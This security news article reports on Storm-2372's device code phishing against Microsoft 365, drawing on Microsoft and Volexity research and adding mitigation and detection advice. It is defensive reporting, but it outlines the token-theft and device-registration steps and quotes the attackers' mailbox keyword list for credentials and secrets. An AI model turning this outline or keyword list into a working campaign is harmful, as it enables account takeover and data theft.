Russian hackers linked to the threat actor Storm-2372 have been attacking government and private entities since August 2024. These hackers specialise in compromising Microsoft 365 accounts using a technique known as device code phishing, which they have discovered to be more effective than typical spear-phishing efforts.
Hackers pose as representatives of government agencies, such as the US Department of State, and prominent scientific institutes. They get permanent access to victims’ accounts by tricking targets into providing a particular Microsoft device authentication code.
In Africa, Europe, the Middle East, and North America, they operate in the fields of government, IT, defence, telecommunications, healthcare, education, energy, and non-governmental organisations.
The Microsoft Threat Intelligence Center (MSTIC) is monitoring this operation under the label “Storm-2372.” Based on the targeted businesses and the tactics used, researchers believe this campaign is likely part of a nation-state effort supporting Russian objectives.
Russian Hackers Manipulate Device Code Authentication to Breach Corporate Security
A method has been created by Russian hackers to steal confidential information from vulnerable businesses. Device code authentication allows users to sign into M365 services on devices that lack a full browser interface, such as Internet-of-Things (IoT) devices and smart TVs.
Instead of a traditional login, these devices display a code that must be entered on another device—often a smartphone or computer. According to Volexity, CozyLarch, a group associated with the infamous Midnight Blizzard group, is at least one threat actor responsible for these attacks.
The threat actors usually invited the victim to a virtual meeting. This allowed Russian hackers to access apps and data as an external M365 user or to join a secure chatroom.
Researchers at Microsoft have found that the threat actor Storm-2372 has been exploiting the device code authentication flow since late August. They trick users on legitimate sign-in sites into entering codes created by attackers. First, the agents pretend to be a well-known and relevant contact on chat apps like Microsoft Teams, WhatsApp, and Signal.
Using phishing techniques, attackers obtain authentication tokens to access targeted accounts. Once inside, they harvest sensitive information and maintain access as long as the stolen tokens remain valid.
According to the Microsoft Threat Report:
During the attack, the threat actor generates a legitimate device code request and tricks the target into entering it into a legitimate sign-in page. This grants the actor access and enables them to capture the authentication—access and refresh—tokens that are generated, then use those tokens to access the target’s accounts and data.
Additionally, stolen authentication tokens provide password-free access to other services like cloud storage and email. By sending phishing messages to other users inside the company from the hijacked account, Microsoft has demonstrated that legitimate sessions allow attackers to move laterally throughout the network. In addition, the Microsoft Graph service is employed to search through messages in the breached account.
According to Redmond, emails that met these filtering requirements were subsequently sent to the threat actor:
“The threat actor was using keyword searching to view messages containing words such as username, password, admin, teamviewer, anydesk, credentials, secret, ministry, and gov.”
Why Device Code Phishing is Effective: Leveraging Legitimate Microsoft Domains
Microsoft disclosed on February 14, 2025, that Storm-2372 had begun using a specific client ID for the Microsoft Authentication Broker while logging in with a device code. This modification makes it possible for attackers to get an updated token.
This token can then be used to request another token for the device registration service. Consequently, the attackers can register a device under their control within Entra ID. That connected device is ultimately used to harvest emails.
A number of emails have been linked to accounts that pose as US Department of State, Ukrainian Ministry of Defence, EU Parliament, and other prominent research organisations.
It is believed that APT29 is one of the clusters causing this activity. BlueBravo, Cloaked Ursa, CozyLarch, Cosy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes are some of the identities used to identify this organisation.
In one case investigated by Volexity, UTA0304 used Signal to get in touch with a victim. By pretending to be a representative of the Ukrainian Ministry of Defence, the attacker persuaded the victim to switch the discussion to the secure messaging service Element.
The Volexity researcher then convinced the victim to click on a link to join a chat room in a spear-phishing email. The link sent the victim to a Microsoft website that asked for a device code to provide access.
Volexity’s Charlie Gardner, Steven Adair, and Tom Lancaster said in their analysis:
The message was a ploy to fool the user into thinking they were being invited into a secure chat, when in reality they were giving the attacker access to their account.
Device codes are only valid for 15 minutes after they are created. This short lifespan forces attackers to act quickly, ensuring that victims expect an “invitation” during real-time communication.
Similarly, groups like CozyLarch and UTA0307 have used the same strategy. They urge victims to join a Microsoft Teams meeting, which grants unauthorised access to their Microsoft 365 account. After gaining access, the attackers steal sensitive information.
Microsoft recommends disabling the device code flow wherever possible to prevent device code phishing attacks by Storm-2372. Additionally, they advise restricting access to Microsoft Entra ID to trusted networks and devices using Conditional Access policies.
If you suspect device code phishing, use the ‘revokeSignInSessions’ command to remove the affected user’s refresh tokens and enforce a Conditional Access policy requiring re-authentication.
Monitor authentication attempts using the sign-in logs in Microsoft Entra ID. Watch for a high volume of login attempts within a short period, device code logins from unfamiliar IP addresses, and unusual authentication prompts sent to multiple users.
Security Awareness Training remains one of the most cost-effective methods of boosting cyber-security within your business. Have a look at our 14 day free trial to find out how many of your staff are susceptible to a phishing attack and learn how you can reduce this number today.
